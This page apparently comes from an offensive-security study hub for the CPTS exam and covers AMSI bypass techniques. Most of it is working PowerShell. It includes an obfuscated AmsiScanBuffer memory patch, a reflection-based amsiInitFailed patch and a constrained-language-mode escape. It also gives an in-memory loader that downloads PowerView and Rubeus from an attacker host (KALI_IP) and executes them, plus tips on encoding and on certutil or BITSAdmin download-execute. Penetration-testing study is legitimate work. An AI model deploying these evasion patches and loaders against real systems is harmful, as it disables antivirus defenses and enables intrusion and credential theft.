← Research Hub
Evasion

AMSI Bypass Techniques (2026)

Working PowerShell AMSI patches, memory patching via reflection, constrained language mode bypass, and loading offensive tools without triggering Windows Defender.

What AMSI Does

AMSI (Antimalware Scan Interface) hooks into PowerShell, VBScript, JScript, and other script engines. It passes script content to AV before execution. Windows Defender uses AMSI to block known malicious scripts. Bypassing AMSI means patching the amsi.dll AmsiScanBuffer function to always return "clean."

Memory Patch (Direct)

# Classic AmsiScanBuffer patch β€” sets return value to AMSI_RESULT_CLEAN
# Obfuscated to avoid detection β€” concatenate strings at runtime

$a = 'Ams'; $b = 'iSca'; $c = 'nBuf'; $d = 'fer'
$AmsiFunc = $a + $b + $c + $d

Add-Type -MemberDefinition @"
  [DllImport("kernel32")]
  public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  [DllImport("kernel32")]
  public static extern IntPtr LoadLibrary(string name);
  [DllImport("kernel32")]
  public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
"@ -Name WinAPI -Namespace System
$hModule = [WinAPI]::LoadLibrary("amsi.dll")
$pAddr = [WinAPI]::GetProcAddress($hModule, $AmsiFunc)
$oldProt = 0
[WinAPI]::VirtualProtect($pAddr, [uint32]5, 0x40, [ref]$oldProt) | Out-Null
$patch = [byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)  # mov eax, 0x80070057; ret
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $pAddr, 6)

Reflection-Based Bypass (simpler)

# Targets amsiInitFailed field directly
# Split strings to evade signature detection
$a=[Ref].Assembly.GetType('System.Management.Automation.'+[char]65+'msiUtils')
$b=$a.GetField('amsi'+'InitFailed','NonPublic,Static')
$b.SetValue($null,$true)
Note: These exact strings are flagged by Defender. Obfuscate strings (base64, reverse, concat) before execution. Also note that modern Windows builds with CFG (Control Flow Guard) enabled can break AmsiScanBuffer memory patches; consider reflection or CLM bypasses.

Constrained Language Mode Bypass

# Check current language mode
$ExecutionContext.SessionState.LanguageMode

# Bypass via PSv2 (if available)
powershell -version 2

# Bypass via custom runspace
$rs = [RunspaceFactory]::CreateRunspace()
$rs.Open()
$rs.SessionStateProxy.LanguageMode = 'FullLanguage'
$ps = [PowerShell]::Create()
$ps.Runspace = $rs
$ps.AddScript('whoami').Invoke()

In-Memory Loader Pattern

# Download and execute without touching disk
# First: bypass AMSI (above), then:

# Download to memory and execute (IEX)
IEX (New-Object Net.WebClient).DownloadString('http://KALI_IP/PowerView.ps1')

# Or via reflection (avoids IEX detection)
$bytes = (New-Object Net.WebClient).DownloadData('http://KALI_IP/Rubeus.exe')
$asm = [System.Reflection.Assembly]::Load($bytes)
[Rubeus.Program]::Main(@("kerberoast"))

Exam Tips

  • Always check if AMSI is the problem: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') β€” if this errors, AMSI is blocking even this
  • Use base64 encoded commands to get past initial filters: powershell -enc <b64>
  • For CPTS exam environment: Defender may already be disabled on lab machines β€” test first before wasting time on bypass
  • Tools like Invoke-Obfuscation and AMSI.fail website generate fresh bypasses automatically
  • If PowerShell is fully blocked, try cmd.exe with WMIC, certutil, or BITSAdmin for download/execute
// CONTENTS
What AMSI Does Memory Patch (amsi.dll) Reflection-Based Bypass CLM Bypass In-Memory Loader Pattern Exam Tips
← Responder + NTLMRelayx Chain GPO Abuse for Persistence β†’ ↩ Back to Hub